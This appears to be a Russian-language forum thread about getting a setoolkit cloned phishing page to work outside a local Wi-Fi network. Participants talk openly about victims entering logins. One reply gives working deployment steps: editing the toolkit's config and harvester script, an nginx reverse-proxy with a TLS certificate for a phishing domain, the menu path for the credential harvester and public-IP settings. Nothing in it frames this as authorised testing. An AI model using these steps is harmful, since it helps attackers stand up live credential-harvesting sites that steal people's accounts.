setoolkit фишинг страница работает только внутри сети wifi

[sol37]

Здравствуйте! Есть проблема с отображением страницы клона. Внутри сети wifi отображается корректно. Если стучаться на ip где лежит копия вне сети, то просто идет загрузка до ошибки по тайму ожидания. Есть подозрения что проблема кроется во внешнем и внутреннем ip. Есть мыслишки? (новичок, чем проще тем лучше.)
Как сделать что бы страница отображалась вне сети?
пробовал на разных сайтах, начиная от гигантов и заканчивая простыми "мамкиными" страницами.

 

[Abaz Abaza]

Прив. Сам бьюсь над этой проблем ... 3 суток .. лет 5 назод это работало без особой плояски ... но теперь стало работать только на уровне локальной скти .. технологии летят.. ) ну думаю х**ня .. лезу в код допиливаю прикучиваю ngrok.. пару файерволов с фильтрацицие по mac адресу и ip обхожу, т.д. в результате в методе с шаблоном стриница становится доступта жертве, но при вводе в не логина и пароля спрашивает ., типа не безапосно, вы уверены... и если наживаеш да типа еверен, то ни чего не происходит... страница виснет ... и все .. ну думаю, ладно.. лезу в код , играюь обработчиками скриптов прикрученныеми к кнопкам авторизации, ибо прин нажатиии все равно все запросы пойдут через червера гугла... и ни чего не помогает,.. делаю прокси, играюсь с подменной dns... на аналоге ngrok , но там более гибкая система кот орая позволяет и порты назначать и dns менять, и тунель нудак приходит и логи трафика всего собираютсяЮ но хуй в рот ...в инет и на любых форомах несут ахинею..

 

[UserName011]

Когда разворачивал кампанию с setoolkit, поднимал сервак на nginx, прикручивал DNS, https и устанавливал в опциях прокси на SET

location /set/ {
    proxy_pass http://127.0.0.1:3000/;
}

Правда еще немного в коде правил, чтобы редирект был корректным на https, вместо http.

 

[Abaz Abaza]

Когда разворачивал кампанию с setoolkit, поднимал сервак на nginx, прикручивал DNS, https и устанавливал в опциях прокси на SET

location /set/ {
    proxy_pass http://127.0.0.1:3000/;
}

Правда еще немного в коде правил, чтобы редирект был корректным на https, вместо http.

а это интересно ... можно поподробнее .какую нить силку или мануал, или поподробнее личный опыт ?

 

[UserName011]

а это интересно ... можно поподробнее .какую нить силку или мануал, или поподробнее личный опыт ?

Личный опыт.
В файле /etc/setoolkit/set.config устанавливал опцию

WEB_PORT=3000

В файле /src/webattack/harvester/scraper.py немного редактировал

В строке
'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
 Меняю http на https
'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)

В nginx добавлял конфиг на свой сервер

server {
    listen              *:443 ssl;
    server_name         domain.xyz;
    ssl_certificate     /etc/letsencrypt/live/domain.xyz/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/domain.xyz/privkey.pem;
    ssl_protocols       TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers         HIGH:!aNULL:!MD5;
    # Path for Social-Engeeniring-Toolkit
    location            /set/ {
                            proxy_pass http://127.0.0.1:3000/;
    }
...

В настройках SET

1 -> 2 -> 3 -> 2 -> Внешний IP с nginx -> Клoнируемый URL

З.Ы. Вообще я поднимал на сервере амазона, но и внутрь локалки это не проблема, если на роутере все настроено, просто мы указываем IP роутера

set:webattack> IP address for the POST back in Harvester/Tabnabbing
[192.168.1.10]: <Белый IP>

З.З.Ы. По-моему я еще в файле hosts прописывал и белый и внутренний IP на фишинговый домен, давно это было.